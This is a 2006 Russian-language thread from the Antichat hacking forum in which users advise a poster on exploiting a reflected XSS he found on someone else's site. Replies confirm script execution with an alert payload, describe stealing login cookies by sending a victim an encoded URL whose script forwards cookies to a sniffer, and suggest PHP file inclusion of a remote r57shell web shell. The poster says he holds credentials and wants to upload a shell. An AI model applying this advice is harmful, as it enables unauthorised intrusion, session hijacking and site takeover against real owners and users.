Форум АНТИЧАТ - что можно выжать из пасивной XSS

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - что можно выжать из пасивной XSS (https://forum.antichat.xyz/showthread.php?t=22315)

strecher

06.08.2006 08:49

что можно выжать из пасивной XSS

Вот нашёл страничку где я могу писать что хочу в адресной строке и это выводится на странице. Подскажите чтоб такого я мог бы сделать?

Cкрин

Думаю фильтра на знаки там нет

bul.666

06.08.2006 08:52

А скрипты работают? Вмысле <script>alert()</script> работает?

strecher

06.08.2006 09:06

Да, работают

Ещё скрин

bul.666

06.08.2006 09:37

ДА че нам до твоих скринов...

А там авторизация по кукам есть?

m0nzt3r

06.08.2006 21:08

пассивная хсс...если там авторизация есть, максимум что сможешь, это: подставишь в урл скрипт, отсылающий куки на снифер, закодируешь урл, дашь жертве урл, чтоб он зашел по этой ссылке...куки будут на снифере.

red1rect

06.08.2006 23:20

А судя по второму скрину - там пхп иньекция, вместо antichat.ru поставь http://rst.void.ru/download/r57shell.txt?

m0nzt3r

06.08.2006 23:47

Цитата:

А судя по второму скрину - там пхп иньекция, вместо antichat.ru поставь http://rst.void.ru/download/r57shell.txt?

там он фрейм вставляет ;)

Tem	06.08.2006 23:49

Ты сперва КСС от ИНКЛУДА резлечи хоть.

strecher

07.08.2006 02:26

авторизация есть, но у меня уже есть username:password

я просто в пхп нифига не понимаю
если есть было бы хорошо визуальный шелл туда загрузить

strecher

07.08.2006 02:27

точней кое что понимаю т.к. знаю asp

Время: 07:47

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице